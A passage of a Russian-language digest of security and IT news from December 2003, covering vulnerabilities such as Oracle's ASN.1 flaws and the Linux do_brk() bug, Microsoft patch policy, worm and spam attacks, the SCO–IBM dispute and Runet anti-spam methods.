Комитет государственной безопасности Белоруссии хочет контролировать интернет-ресурсы, предлагая изменить законодательство о средствах массовой информации и ряд других законов, сказал, выступая в парламенте, глава КГБ Леонид Ерин. Белоруссия в настоящее время готовится внести изменения в закон о средствах массовой информации, которые ужесточают ответственность за распространение недостоверной информации, и распространить действие закона о СМИ на интернет-издания, деятельность которых сейчас законодательно не регулируется. «То, что надо сегодня навести порядок в сети интернет, это несомненно. К сожалению наше законодательство не отвечает тем требованиям, которые предъявляет жизнь», — сказал г-н Ерин. В Белоруссии за последний год после закрытия в результате вмешательства государства ряда независимых газет и осуждения за клевету на президента страны трех независимых журналистов появилось несколько независимых интернет-изданий . «Вопрос контроля интернета, прежде всего, контроля за использованием его различными незаконными, преступными организациями, сегодня актуальнейший для нас вопрос», — сказал г-н Ерин журналистам. Источник - http://www.rbc.ru
10/12/2003 19:31 Oracle латает "дыры" в серверном ПО.
Компания Oracle выпустила предупреждение и исправления для ряда серьезных уязвимостей в защитных протоколах, используемых некоторыми из ее серверных продуктов. Уязвимости затрагивают Oracle Database Server в полных версиях 8i и 9i, Oracle 9i Application Server, а также версии 8 и 9 Oracle HTTP Server. Любой клиент, имеющий доступ к уязвимому Oracle-серверу, может воспользоваться существующими «дырами», а степень риска квалифицируется как "высокая". Уязвимости используют синтаксическую конструкцию ASN.1 (Abstract Syntax Notation 1) из протоколов SSL и TLS, широко используемых для защиты данных в интернете. Компания настоятельно рекомендует установить выпущенные исправления и подчеркивает, что альтернативного решения проблемы не существует. Как отмечают в лондонском National Infrastructure Security Coordination Center, специалисты которого обнаружили уязвимость, таким недостатком страдает очень много программного обеспечения, использующего эти протоколы, а не только продукты от Oracle. Источник - http://www.cnews.ru
10/12/2003 19:07 Microsoft не будет выпускать патчей в декабре.
По сообщению compulenta.ru, компания Microsoft не будет выпускать обновлений для своих продуктов в декабре нынешнего года. С октября софтверный гигант перешел на ежемесячный выпуск патчей. Более частые обновления, по отзывам клиентов, затрудняют работу системных администраторов. Кроме того, Microsoft стала объединять исправления для нескольких схожих уязвимостей в одних и тех же заплатках. Первая ежемесячная порция патчей была выпущена в ноябре. Однако в нынешнем месяце таких обновлений не ожидается. Как рассказал изданию Infoworld менеджер по безопасности продуктов Microsoft Иэйн Малхолланд, перерыв в выпуске патчей объясняется тем, что ни одна из заплаток пока не может быть выпущена в качестве официального обновления. Патчам требуются дополнительное тестирование и отладка. При этом отказ от выпуска декабрьской порции патчей никак не связан с рождественскими праздниками, подчеркнул Малхолланд. Менеджер Microsoft сообщил, что, скорее всего, новые заплатки Microsoft выпустит 13 января 2004 года. Положение дел может изменить только какая-либо реальная угроза широкомасштабного использования дыр в продуктах Microsoft. В этом случае соответствующие обновления будут выпущены вне графика. Сейчас такой опасности, по данным Microsoft, не существует. Подробности - http://www.infoworld.com/article/03/12/09/HNmicrosoftxmas_1.html
10/12/2003 18:34 За ошибкой кроется потенциал Slammer .
Во вторник аналитическая фирма Core Security Technologies предупредила, что недавно исправленную ошибку в Windows Workstation, о которой Microsoft сообщила в прошлом месяце, можно использовать для создания быстро распространяющегося червя, подобного SQL Slammer. «Мы убеждены, что этот новый вектор атак делает уязвимости еще более опасными и критичными: предложенных решений по их устранению недостаточно, так как появляется возможность создавать чрезвычайно эффективных червей», — написал в сообщении email, адресованном CNET News.com, главный технолог Core Security Technologies Айвен Эйрс. Компания установила также, что с применением аналогичных пакетов «выстрелил и забыл» протокола user datagram protocol (UDP) можно эксплуатировать и ошибки в службе Windows Messenger, позволившие этим летом распространиться червю MSBlast. При этом устанавливать связь между двумя компьютерами не требуется. Достаточно, чтобы компьютер-источник мог быстро отправлять пакеты, не беспокоясь о том, доходят ли они до цели. А благодаря широковещательному характеру атаки злоумышленнику не нужно знать индивидуальные адреса компьютеров в сети. Такая тактика позволяет создать червя, который распространяется быстрее прошлогоднего SQL Slammer. Подробности - http://news.zdnet.co.uk/internet/security/0,39020375,39118416,00.htm
10/12/2003 18:22 Безопасность вынуждает переход с Microsoft на Linux
Как пишет www.nixp.ru, директоры по информационным технологиям планируют уйти с платформы от Microsoft на open-source ПО на настольных ПК ввиду слабой безопасности систем от MS, - об этом гласит сообщение Merrill Lynch. Результаты опроса сотни CIO (75 из Америки и 25 из Европы) показывают, что 58 процентов проголосовавших уже поглядывают на open-source из-за лучших показателей свободного ПО в плане безопасности. Американские CIO более активны в плане освоения Linux на настольных ПК в отличие от своих европейских коллег. Кроме того, в докладе сообщается, что безопасность может свести на нет новую программу лицензирования Microsoft. Подробности - http://www.vnunet.com/News/1151313
9/12/2003 16:06 Москва: хакер-фрикер "скачал" из СЕТИ видеофильм за счет пенсионерки.
С новым видом компьютерных преступлений – скачиванием фильмов из Сети через компьютер-жертву – столкнулись на минувшей неделе столичные сыщики. Как сообщили в правоохранительных органах, расследованием оперативники ОВД "Москворечье-Сабурово" занялись после того, как к ним обратилась 64-летняя жительница дома N52 на Каширском шоссе. К ней на днях пришел счет от крупного столичного провайдера телефонных и интернет-услуг. Выставленная сумма показалась пенсионерке неоправданно завышенной. Позже выяснилось, что помимо обычной ежемесячной таксы ей предлагалось заплатить еще и 3800 рублей дополнительно. Не поверив, что столько можно наговорить, она попросила в компании подробную распечатку. Из бумаги следовало, что через телефонную линию и, вероятно, на компьютер, установленный в квартире пенсионерки, был выкачан 25 мая огромный файл. Оператор компании пояснила, что это мог быть, например, фильм. Позже версия подтвердилась, файлом была комедия. 16-летняя внучка и 19-летний внук заверили бабушку, что не качали из Сети такие файлы. Кроме того, даже следа его на компьютере не осталось. Скорее всего, злоумышленник взломал защиту и зашел в Сеть под именем и с паролем, которыми пользовались внуки потерпевшей. Дальнейшее для хакера было лишь делом времени. Сейчас сыщикам в рамках возбужденного по поданному потерпевшей заявлению предстоит найти взломщика по тем немногим виртуальным следам, которые он оставил в Сети. Сделать это через полгода будет крайне сложно. Источник - http://www.oxpaha.ru
9/12/2003 15:52 Вирусы атакуют борцов со спамом.
По сообщениям compulenta.ru, на минувшей неделе многие серверы, поддерживающие списки почтовых адресов, использующихся для рассылки спама, подверглись серии DoS-атак. Эти атаки проводились с компьютеров, пораженных несколькими вариантами почтового червя Mimail (этот червь, по данным "Лаборатории Касперского", стал самой распространенной вредоносной программой ноября). По крайней мере, три варианта этого червя запрограммированы на проведение атак на антиспамерские сайты. Основными целями атак стали три сервера: Spamhaus Project, SpamCop и Spam Prevention Early Warning System. Все эти ресурсы поддерживают динамически обновляющиеся списки почтовых серверов, использующихся для рассылки спама. Провайдеры интернета и компании могут использовать эти сведения для фильтрации электронной корреспонденции. Стоит отметить, что нынешняя DoS-атака на антиспамерские сайты носила, скорее, демонстрационный характер. И хотя нагрузка на серверы несколько выросла, они продолжили работу в обычном режиме. Правда, администрация Spamhaus Project отметила, что в ответ на атаку была проведена модернизация оборудования. Интересно, что, помимо бомбардировки серверов ошибочными запросами, организаторы атаки решили создать и дополнительный поток почты на антиспамерские сайты. Для этого в письма с вирусами были помещены данные о запросах на получение детской порнографии. Чтобы отменить такой запрос (разумеется, поддельный) пользователю предлагалось отправить письмо по указанному адресу, принадлежащему одному из атакуемых сайтов. Подробности - http://www.securityfocus.com/news/7575
9/12/2003 15:20 Выход PHLAK 0.2.
Команда разработчиков объявила о доступности релиза 0.2 дистрибутива Linux под названием PHLACK, представляющего собой модульный секьюрити дистрибутив Linux из серии Live (то есть грузящегося с загрузочного CD и не требующего инсталляции). Cобственно, само название PHLACK расшифровывается, как [P]rofessional [H]acker's [L]inux [A]ssault [K]it. Оснащён целой кучей инструментов, позволяющих осуществлять аудит безопасности систем. Помимо этого комплектуется 2-мя GUI - fluxbox и XFCE4 (последний представляет собой альтернативу проекту XFree86), инструментарием для организации печати и редактирования документов, ограниченным набором мультимедийных примочек и т.д. Сам PHLAK основан на ещё одном Live-дистрибутиве - проекте Morphix, выпускаемом и поддерживаемом Alex de Landgraaf. Сайт проекта - http://www.phlak.org
9/12/2003 14:10 Microsoft прекращает поддержку старых продуктов.
По сообщению zdnet.ru, в обращении на веб-сайте Microsoft для разработчиков компания перечисляет ряд старых продуктов, которые снимаются с производства и перестанут предоставляться заказчикам с 15 декабря. В числе этих продуктов SQL Server 7, Office XP Developer, Windows 98 и ряд инструментов и поправок, относящихся к Office 2000. К концу декабря Microsoft обещала обновить Java-совместимые версии некоторых продуктов, включая Office XP Professional с FrontPage, Publisher 2002, Windows NT 4.0 и Small Business Server 2000. По истечении установленного срока продукты нельзя будет приобрести через веб-сайт для разработчиков MSDN и «другие каналы Microsoft». В постинге, датированном 4 декабря, компания сообщает, что это «требование мирового соглашения, достигнутого в январе 2001 года» в споре между Sun и Microsoft о лицензионном соглашении по Java. По соглашению с Sun о распространении виртуальной машины Java программное обеспечение Microsoft должно исполнять Java-программы. Microsoft имеет право модифицировать свое Java-ПО, исправляя критические ошибки или пробелы в защите, по 2 января 2004 года. Хотя Microsoft больше не будет распространять перечисленные продукты, поддержка многих из них продолжится. Например, SQL Server 7 компания планирует поддерживать до конца 2007 года. Платная поддержка Windows 98 предоставляется до конца текущего месяца. Поддержку Windows 98 также осуществляют независимые компании. Подробности - http://communities.microsoft.com/newsgroups/previewFrame.asp?...
9/12/2003 13:08 XFS вошла в 2.4 ядро.
Господин Марцело Тосатти, ответственный за поддержание ветки 2.4 ядра сообщил, что XFS (журналируемая файловая система, разработанная и использующаяся в операционной системе IRIX компании Silicon Graphics Inc.) включена в код ядра 2.4. Произошло это после того, как Christoph Hellwig провёл аудит кода XFS, добавив при этом несколько изменений и решив, что теперь XFS можно смело внедрять в ядро. Теперь поддержка XFS доступна через CONFIG_XFS_FS в файле конфигурации ядра. Snapshot ядра уже доступен, хотя рекомендуется дождаться слудующего патча с kernel.org или выпуска новой версии ядра. Напомним, что в текущей версии ядра (2.4.23) доступны следующие версии журналируемых файловых систем: EXT3, ReiserFS и JFS (от IBM). Подробности - http://kerneltrap.org/node/view/1751
9/12/2003 12:25 Недельный отчет о вирусах Panda Software.
Опубликован традиционный еженедельный отчёт о вирусной активности от Panda Software. На этот раз внимание уделено в отчёте трем червям: версиям L и M червя Mimail, а также Gaobot.BK. Подробности - http://www.viruslab.ru/press/index.php?go=show&num=220
9/12/2003 12:14 Британские компании пересчитали убытки от деятельности вирусописателей.
Как сообщает viruslist.com, сумма ущерба, понесенного британскими компаниями в ходе каждого вирусного инцидента, составляет в среднем 122 тыс. фунтов стерлингов, что значительно превышает прежние оценки убытков от деятельности вирусописателей. Таковы результаты исследований группы Corporate IT Forum (Tif), сообщает сайт Computer Weekly. В исследованиях Tif фигурируют 140 компаний — «голубых фишек», для многих из которых уходящий год оказался весьма нелегким в связи с появлением таких вредоносных программ как Lovesan, Welchia, Sobig и Helkern (Slammer). Полученные исследователями результаты более чем в четыре раза превышают среднюю сумму потерь в 30 тыс. фунтов стерлингов, фигурировавшую в предыдущем отчете министерства торговли и промышленности Великобритании и аудиторской компании PricewaterhouseCoopers. Для 75% участвовавших в исследовании компаний потери связаны с работой IT-отделов, представители которых тратили до 365 человеко-часов на ликвидацию последствий вирусных атак. В 35% случаев вирусы останавливали работу всей компании в целом, а общие трудопотери достигали 3080 человеко-часов. Подробности - http://www.viruslist.ru/click?_URL=http://www.computerweekly.com/articles/article.asp?...
9/12/2003 11:44 С днём рождения, SecurityLab!
Cегодня сайту (и проекту) SecurityLab.ru исполнилось 2 года. Команда UINC (и ньюсмейкер лично) поздравляет всю команду SecurityLab (и лично Александра Антипова, ака PigKiller) с этим знаменательным событием и желает коллегам дальнейших успехов в области освещения проблем компьютерной безопасности и роста числа посетителей сайта! Удачи вам, коллеги! :))) Источник - /dev/head
9/12/2003 11:26 Microsoft готовит CD с поправками для Windows.
На будущей неделе Microsoft планирует приступить к тестированию CD, предназначенного для пользователей Windows 98, Windows 98 SE и Windows ME. Он облегчит им доведение их ПК до современного уровня — это еще одна попытка изменить ситуацию, приведшую к разгулу вирусов и спама. В прошлом месяце софтверный гигант призвал пользователей принять участие в бета-тестировании CD, содержащего обновления для старых версий Windows. «Этот компакт-диск с секьюрити-апдейтами будет особенно полезен тем заказчикам, которые пользуются медленным доступом к интернету, а также тем, кто нечасто посещает веб-сайт Microsoft, чтобы загрузить обновления для своих компьютеров», — говорилось в обращении компании по email к потенциальным тестерам. На этой неделе проект перешел в следующую фазу: согласившихся принять участие в программе проинформировали, что выпуск release candidate появится где-то на будущей неделе. Новое письмо к бета-тестерам опубликовано на сайте Winbeta.org. Дату выпуска CD Microsoft еще не назначила. Продукт, который Microsoft «разрабатывает, принимая во внимание все обстоятельства», может стать первым шагом на пути к решению проблемы гарантированной установки патчей на все компьютеры, подключенные к интернету. Многие пользователи редко, а то и вообще никогда не устанавливают поправки на свои системы — по неведению, из лени или не желая тратить целые часы на загрузку огромных собраний поправок по медленному интернет-соединению. Подробнее - http://news.zdnet.co.uk/0,39020330,39118339,00.htm
8/12/2003 20:56 ГАС "Выборы" никто не ломал, а сайт ЦИКа сам сломался.
Как сообщает internet.ru, в воскресенье ряд СМИ сообщил о том, что хакеры якобы неоднократно пытались взломать систему "Выборы", через которую идет автоматизированный подсчет голосов избирателей на выборах депутатов Госдумы, сообщает РИА "Новости". "Я совершенно официально заявляю, что ни о каких попытках атак нам неизвестно", - сказал он. "Никаких угроз для нормальной работы ЦИК нет", - добавил Александр Вешняков. Глава ЦИК и попросил СМИ "не распространять ложных слухов и не спекулировать на них". Тем не менее, факты таковы - попасть на сайт, на котором нам господин Вешняков обещал результаты выборов в режиме реального времени, за 4 часа попыток в период с 23.00 до 3.00 не удалось ни сотрудникам редакции Internet.ru, ни десяткам их знакомых, которых опросили по ICQ. Этот сайт рекламировался по главным каналам ТВ несколько последних дней. Как итог, в районе полуночи по московскому времени он стабильно показывал сообщении о слишком большом числе пользователей, а приблизительно с часу ночи вообще перестал отвечать на запросы. Источник - http://www.internet.ru
8/12/2003 20:13 Чтобы пожаловаться на Microsoft, необходим Internet Explorer.
Американские координаторы судебного процесса против компании Microsoft представили веб-сайт, который позволяет серферам сообщать о нарушениях антимонопольного закона в онлайне. Однако условия подачи заявления вызывают недоумение. Все было бы смешно, если не выглядело бы так грустно. Когда пользователи Netscape и Opera решили высказать на веб-ресурсе свое недовольство действиями софтверного гиганта, им было отказано в этом удовольствие. Оказалось, чтобы отправить собственные замечания непременно нужен бразуер Internet Explorer. И никак по-другому. «Я пытался использовать Opera 7 и Netscape 7, чтобы инсталлировать Adobe Reader для работы с веб-страницей Microsoft Settlement. Однако мои попытки были безрезультатны. Чтобы все заработало, я должен настроить Internet Explorer», - сообщает шокированный читатель The Inquirer . Источник - http://www.runet.ru
8/12/2003 19:50 Нововведений в Linux 2.4.25+ не будет.
Программист, ответственный за текущую версию Linux'а, 2.4, планирует завершить нововведения для того, чтобы ускорить процесс перехода на новое ядро — 2.6. Marcelo Tosatti, занимающийся поддержкой Linux kernel 2.4 по просьбе Linus Torvalds'а, отца Linux, заявил в одном из своих сообщений в Linux Kernel Mailing List, что будущий Linux-релиз, ядро 2.6, уже достаточно зрел для использования в качестве основы новых проектов. Tosatti добавит некоторые важные изменения и поддержку выбранных новых устройств в версию 2.4.24, находящуюся в разработке. Но дальнейшие версии (2.4.25 и последующие) будут выпускаться только для исправления ошибок в безопасности и устранения критических уязвимостей. Источник - http://www.nixp.ru
8/12/2003 19:36 "Сдвоенный" шлюз безопасности.
Анонсированная компанией NetContinuum сетевая приставка Web Security Gateway 4.0 способна защитить Web-серверы примерно от 4 тыс. известных ей видов атак. Кроме межсетевого экрана для Web-приложений в системе предусмотрен встроенный межсетевой экран класса Stateful Inspection. Устройство обеспечивает, в частности, защиту от атак на 22-й порт протоколов TCP и UDP, который используется, например, СУБД Oracle, а также серверами приложений и системами электронной коммерции. NetContinuum обещает стать первой компанией, интегрировавшей традиционный межсетевой экран с поддержкой блокировки доступа к TCP и UDP-портам в межсетевой экран для Web-приложений. Устройство предлагается в вариантах для 100-мегабитной и гигабитной локальной сети. Источник - http://www.osp.ru
8/12/2003 19:12 В ближайший месяц SCO покажет "ворованный" код
Корпорация IBM в пятницу одержала весьма важную победу в борьбе с компанией SCO. Суть дела сводится к тому, что SCO обвинила IBM в незаконной передаче фрагментов исходного кода операционной системы Unix System V разработчикам сообщества open source. IBM же, в ответ на выпады SCO, не так давно подала встречный иск, потребовав от инициаторов конфликта раскрыть полную информацию о сути претензий и представить "украденный" код. Однако SCO практически сразу же направила в суд меморандум с прошением отклонить запрос IBM. Но и на этом обмен "ударами" не закончился, и в начале прошлого месяца IBM также выставила меморандум, настаивая на том, чтобы SCO все же опубликовала скопированный из Unix System V код. И вот, 5 декабря суд штата Юта вынес весьма значимое решение по делу "SCO против Linux". Согласно постановлению федерального судьи Дейла Кимболла, истцы в тридцатидневный срок обязаны обосновать свои претензии и представить ответчикам "ворованный" код. Источник - http://www.compulenta.ru
8/12/2003 18:56 Yahoo создает собственную технологию борьбы со спамом.
Компания Yahoo в конце прошлой недели заявила о создании собственной технологии борьбы со спамом, основанной на запросах подтверждения идентификационных данных отправителей электронных писем, сообщает Reuters. Новый продукт Yahoo получит название Domain Keys и с 2004 года будет свободно распространяться среди крупнейших бесплатных почтовых веб-служб. Антиспамерская разработка одной из ведущих мировых интернет-компаний будет автоматически вставлять специальный ключ в заголовок письма. Принимающая служба будет сверять данные присланного ключа с информацией о домене отправителя, хранящейся в реестре доменных имен. В случае успешной идентификации письмо будет доставляться адресату. Если указанный в теле письма ключ окажется отличным от заявленного в реестре, письмо будет заблокировано. «Одна из ключевых проблем спама заключается в том, что ни мы, Yahoo, ни пользователь не знаем, действительно ли письмо пришло оттуда, откуда заявлено. То, что мы предлагаем, подразумевает изменение схемы работы интернета путем внесения запросов на идентификацию автора электронного послания», — прокомментировал новую разработку вице-президент компании Брэд Гарлингхауз (Brad Garlinghouse). Источник - http://www.viruslist.ru
8/12/2003 18:37 Евгений Касперский: Мафия скоро возьмется за хакеров и спамеров.
Евгений Касперский, эксперт по вопросом компьютерной безопасности и глава компании "Лаборатория Касперского", разрабатывающей антивирусное программное обеспечение, заявил, что организованная преступность может попытаться получить контроль над нелегальной деятельностью в Интернете, главным образом над создателями компьютерных вирусов и средствами рассылки спама. "Я хотел бы предупредить весь компьютерный андеграунд. Если вы пишете вирусы или программы для компьютерного шпионажа или рассылаете спам, знайте, что рано или поздно мафия постучит в вашу дверь", - приводит слова Касперского газета "Ведомости". Он считает, что организованную преступность привлекает высокая прибыльность спам-технологий, а создателей вирусов мафия может расценить как ценных специалистов в области компьютерного шпионажа и саботажа. Как отмечают "Ведомости", некоторые специалисты в сфере интернет-безопасности не согласны с позицией Касперского или согласны с ней лишь частично. По отдельным экспертным данным, организованная преступность уже давно осуществляет деятельность в некоторых связанных с высокими технологиями отраслях и уже располагает услугами компьютерных экспертов. В частности, широко известно, что организованная преступность причастна к распространению контрафактного программного обеспечения. Источник - http://vedomosti.ru/
7/12/2003 17:26 10 самых распространенных проколов.
Благодаря cybervlad-у c bugtraq.ru, обнаружена интересная ссылка. Часто публикуемые рейтинги типа "20 самых распространенных уязимостей" обычно смещают акцент именно на технические/программные ошибки. Однако, главная проблема обычно кроется в человеческом факторе - неправильная настройка, отсутствие системного подхода к эксплуатации и т.п. Tom Salkield решил восполнить этот пробел и подготовил свой рейтинг: "The top 10 Internet security bloopers". Как говорится, "обязательно к прочтению каждым сисадмином". Подробности - http://www.continuitycentral.com/feature041.htm
7/12/2003 17:11 ФАПСИ нашли замену.
Указ о закрытии специального ведомства, опекавшего ИТ-отрасль, был подписан президентом еще весной нынешнего года. После этого "бесхозными" оказались сразу несколько проектов, которые лишь теперь обретают своих покровителей. Одним из наиболее значимых проектов ФАПСИ была информационно-телекоммуникационная система специального назначения (ИТКС) в интересах госорганов. Она включает в себя телекоммуникационную инфраструктуру, систему обмена электронными документами между министерствами, ведомствами и местными органами власти (в том числе с использование электронно-цифровой подписи), а также информационные ресурсы органов госвласти. На этой неделе, Минсвязи предложило увеличить бюджет "Электронной России" на 3 млрд. рублей до 2007 г. для того, чтобы продолжить проект создания ИТКС, сообщает "ComNews". Создание и эксплуатацию ИТКС Минсвязи предлагает выполнять совместно с ФСБ, ФСО и Минэкономразвития. В случае принятия предложений Минсвязи операторы связи и поставщики оборудования будут выбираться на открытых конкурсах. Источник - http://www.internet.ru
7/12/2003 16:47 Ирландские беспроводные сети – рай для киберпреступников.
Бизнесмены, использующие беспроводные компьютерные сети в Северной Ирландии, чрезвычайно уязвимы для хакеров. Лектор Ольстерского университета Кевин Каррэн предупреждает, что недостатки компьютерной безопасности многих компаний позволяют взломщикам подсоединяться к их системе, бесплатно пользоваться Интернетом, а также получать доступ к конфиденциальной, деловой информации. К такому выводу г-н Каррэн пришел в результате следственных экспериментов, прошедших в Лондондерри. Однажды после полудня лектор и коллеги смогли проникнуть в 15 компьютерных сетей компаний и обнаружить еще 5, которые можно взломать без особого труда. При этом для подсоединения к беспроводным сетям использовалось дешевое оборудование. По словам исследователей, проблема связана с тем, что, устанавливая беспроводные сети, компании не заботятся об обеспечении безопасности доступа к ним. Другой вопрос, связан с радиусом действия радиоантенны, которая обслуживает фирмы, - сообщает ВВС. Источник - http://www.runet.ru
7/12/2003 16:20 Мошенник выплатит Microsoft $1,7 млн..
Житель штата Виржиния согласился выплатить $1,7 млн. компании Microsoft как часть признания своей вины в продаже поддельного ПО. Бен Джон Барбот (Ben John Barbot), 51 год, был признан виновным в нарушении авторских прав и перевозке фальсифицированного товара. Он признал, что получил от розничных продаж поддельного ПО, которое распространял, более $7 млн. Согласно его собственному заявлению, с июня 2001 года по декабрь 2002 года Барбот успел продать более 17 тыс. поддельных программ Microsoft. Теперь горе-продавцу грозит 15 лет тюремного заключения, и, как ожидается, приговор вступит в действие 20 февраля. По словам юристов, это крупнейшее возмещение убытков от продаж поддельных продуктов Microsoft. Среди тысяч реализованных копий, изготавливаемых и поставлявшихся из другого штата, первое место занимали подделки программы Office 2000 Professional. Продукция упаковывалась под изделия от Microsoft, и Барбот рекламировал их как настоящие. Продажи велись через несколько интернет-представительств, созданных им самим же и имевших названия eSoftware Outlet, Best Byte Software, Bright Software и Wahoo Warehouse. Деятельность Барбота привлекла внимание налоговых органов после того, как от лица компании Microsoft ему было направлено письмо с приказом о запрещении продолжения противоправных действий. Несмотря на то, что подобное обращение делалось несколько раз, Барбот продолжал реализовывать фальшивое ПО через другие структуры, отмечается в материалах судебного дела. Источник - http://www.cnews.ru
7/12/2003 15:53 Linus vs SCO
Линуса видимо достали нападки SCO и он покопался в законе об авторских правах. В разделе определений используемых терминов он нашел, что в качестве оплаты за защищённый авторским правом код может приниматься другой защищённый авторским правом код. Таким образом, GPL, гарантирующая доступ оригинальному автору к коду, который порождён от его кода, не может быть неконституционной. Подробности: http://www.groklaw.net/ Источник: http://www.linux.org.ru
6/12/2003 15:15 Изменит ли что-нибудь антиспамерский закон?
Как полагают в компании Gartner, не следует рассчитывать, что ожидающий подписи президента американский закон против спама CAN-SPAM остановит поток непрошеной рекламы, попадающей в корпоративные ящики электронной почты. Аналитики рекомендуют компаниям полагаться только на собственные ресурсы - спам-фильтры и системы управления электронной почтой. Как отмечают в Gartner, CAN-SPAM отменит действие антиспамерских законов, которые уже действуют в 36 штатах и в большинстве случаев являются более строгими, нежели всеамериканский. Аналитики подметили также, что билль хоть и обязывает к введению механизма отписки от рассылок, не указывает ответственного за исполнение соответствующих запросов. В случае ратификации законопроекта, как считают в Gartner, придется разрабатывать технологию "сортировки" писем на легальную рекламу и спам, что может оказаться весьма сложной задачей. Кроме того, спамеры смогут обходить закон, пользуясь услугами зарубежных провайдеров, которые находятся вне юрисдикции США. Источник - http://www.osp.ru
6/12/2003 13:12 Звенигород на сутки остался без Интернета.
По сообщению Одинцовского узла электросвязи (Одинцово, Московская обл.), 2 декабря 2003 г., в результате повреждения кабеля на участке Звенигород-Одинцово доступ в Интернет из Звенигорода был прерван. Канал был восстановлен к 15:30 3 декабря 2003 г. Подробности - http://odintsovo.comcor.ru/win/news.html
6/12/2003 13:03 Хотфикс для ядра Linux.
Shane Canon из университета Калифорнии выпустил хотфикс для ядра Linux, предотвращающий переполнение буфера в ядре при вызове функции do_brk(), а также фиксирующий подобную атаку в лог-файлах. Сам автор пишет, что работоспособность проверялась им на ядрах RedHat 2.4.18-27.7.xsmp и 2.4.20-20.7smp. Сам хотфикс представляет собой модуль ядра. Для его работы, естественно, необходима поддержка LKM в ядре. Хотфикс - http://www.securityfocus.com/archive/1/346609/2003-12-03/2003-12-09/0
6/12/2003 12:11 Кибератаки на сеть банкоматов ОАЭ.
По данным исследований, проведенных производителем антивирусного программного обеспечения Symantec, в мировой десятке наиболее доступных для хакеров стран пять позиций занимают государства Ближнего Востока и Средней Азии: Объединенные Арабские Эмираты, Саудовская Аравия, Кувейт, Египет и Иран. Как отмечает газета The Daily Star, в одних только Объединенных Арабских Эмиратах число хакерских атак возросло на 300% по сравнению с аналогичным периодом прошлого года. В ходе недавней кибератаки на сеть банкоматов страны потери Эмиратов составили, по различным оценкам, от 2 до 3 млрд долларов. В результате расследования этого инцидента выяснилось, что атака, вероятно, была организована в Индонезии. Серьезным подтверждением активности компьютерных преступников в регионе являются сведения, предоставленные одной из местных нефтяных компаний. Около 4 лет назад ее специалисты по компьютерной безопасности установили программное обеспечение, фиксирующее попытки компьютерного взлома. Число ежедневно регистрируемых атак порой достигало 2 тысяч. Зачастую хакерские атаки в регионе напрямую связаны с политическими событиями. Так, спустя несколько дней после 11 сентября 2001 года, группа хакеров вывела из строя сети одного из крупнейших ближневосточных Интернет-провайдеров. Взломщики заявили, что будут продолжать совершать аналогичные акции в Афганистане и Ираке в ответ на террористические нападения в США. По данным некоторых специализированных отчетов, большая доля хакерских атак на арабские страны исходит с территории Израиля. В то же время и сам Израиль, где число Интернет-пользователей превышает 1 млн человек, также часто подвергается нападениям компьютерных преступников. Особо заметным рост подобных преступлений стал после начала второй интифады в сентябре 2000 года. Отдельные исследователи утверждают, что объектами нападения хакеров стали 45% израильских сайтов. Источник - http://www.crime-research.ru
6/12/2003 11:55 Начертано будущее стандартов Wi-Fi.
Ведущие отраслевые группы прояснили судьбу стандартов Wi-Fi нового поколения с повышенным уровнем безопасности и расширенными возможностями IP-телефонии. Представители ведущих отраслевых групп пролили свет на будущее стандартов Wi-Fi, что позволяет производителям новых продуктов оценить, с какими инструментами им придется работать. В среду на конференции Wi-Fi Planet представители Института инженеров электротехники и электроники (IEEE) и организации Wi-Fi Alliance продемонстрировали конкретные планы выпуска протоколов, которые войдут в различные стандарты 802.11a/b/g с целью повышения уровня безопасности и пропускной способности, а также поддержки IP-телефонии (voice over Internet Protocol, VoIP). Влияние этих организаций способствовало росту популярности и распространению беспроводных сетей Wi-Fi, однако многие разочарованы тем, что на согласование стандартов и тестового оборудования уходит слишком много времени, а пока их нет, трудно разрабатывать новые продукты и гарантировать совместимость. Подробности - http://news.zdnet.co.uk/0,39020330,39118317,00.htm
6/12/2003 11:46 Обновление по безопасности от Apple.
Вчера корпорация Apple сообщила о выпуске очередного обновления по безопасности - Security Update 2003-12-05. Выпущено 2 обновления, одно - для Jaguar, второе - для Panther. В частности, это обновление устраняет возможность похищения cookie, которая была обнаружена ранее в браузере Safari (обновился до версии 1.1.1). Обновление - http://www.info.apple.com/support/downloads.html
6/12/2003 10:38 Подробное описание уязвимости в ядре Linux.
Шум вокруг уязвимости, обнаруженной в ядре Linux не утихает. Paul Starzetz из польской компании iSEC Security Research объявил о доступности документа, подробно описывающего уязвимость в функции do_brk() ядра Linux. Помимо самого описания рассматривается также пример эксплоит-кода для эксплуатации этой уязвимости с целью повышения привилегий в системе. Документ выпущен в PDF-формате. Описание - http://isec.pl/papers/linux_kernel_do_brk.pdf
5/12/2003 16:46 Весь Интернет под колпаком.
Американский электронный гигант компания IBM завершает работу над созданием сверхмощного компьютера, который призван осуществлять тотальный контроль над Интернетом и анализировать находящиеся в нем данные в интересах ряда государственных служб США. Проект, имеющий кодовое название «Веб-фонтан», уже сейчас позволяет IBM прочитывать и анализировать содержание 20 миллионов интернет-страниц в сутки. Технически «Веб-фонтан» представляет собой виртуальную систему из 2 тысяч серверов, которые работают параллельно. Суперкомпьютер имеет беспрецедентные возможности для решения сложнейших информационных и аналитических задач. Интерес к проекту уже проявили крупнейшие энергетические компании США, стремящиеся вытеснить своих иностранных конкурентов из ряда стратегически важных регионов мира. Новое изобретение IBM дает широчайшие возможности для получения из Интернета конфиденциальной информации. Источник - http://www.securitylab.ru
5/12/2003 16:22 KM.RU внедрила спорный метод защиты от спама.
Почтовая служба портала KM.RU решила защитить своих пользователей от непрошеной корреспонденции рекламного характера (спама) с помощью ранее не применявшегося в Рунете метода авторизации отправителя. Между тем, в компаниях "Яндекс" и "Ашманов и партнёры" (разработчика антиспамовского фильтра для Mail.ru) считают подобный подход принципиально неверным. Фильтр "Карантин", который KM.RU предложила своим пользователям, не вчитывается в текст электронных посланий, а проверяет адрес отправителя на наличие в белом списке адресной книге. Если адреса в этом списке нет, то автору проверяемого письма посылается проверяющий запрос, в то время как само послание попадает в специальную "карантинную" папку. В папке же "входящие" письмо окажется только после ответа на запрос. Расчёт создателей этой службы следующий: поскольку только совсем "неграмотный" спамер будет подписывается своим рабочим адресом, то защита от спама должна быть на уровне 100%. Но не всё так просто. Одна из проблем заключается в том, что запросы на подтверждение отправляют почтовые роботы, тогда как, по мнению многих экспертов, "роботы должны молчать". В предыдущем абзаце уже говорилось, что спамеры не рассылают письма со своих адресов. Если фильтры, подобные "Карантину", будут использоваться повсеместно, то Интернет рискует быть "замусоренным" многочисленными запросами, отправленными на несуществующие адреса, что негативно скажется на сетевом трафике. И это ещё не самое страшное. Как говорит главный редактор "Яндекса" Елена Колмановская, "представьте себе, что кто-то массово разослал на 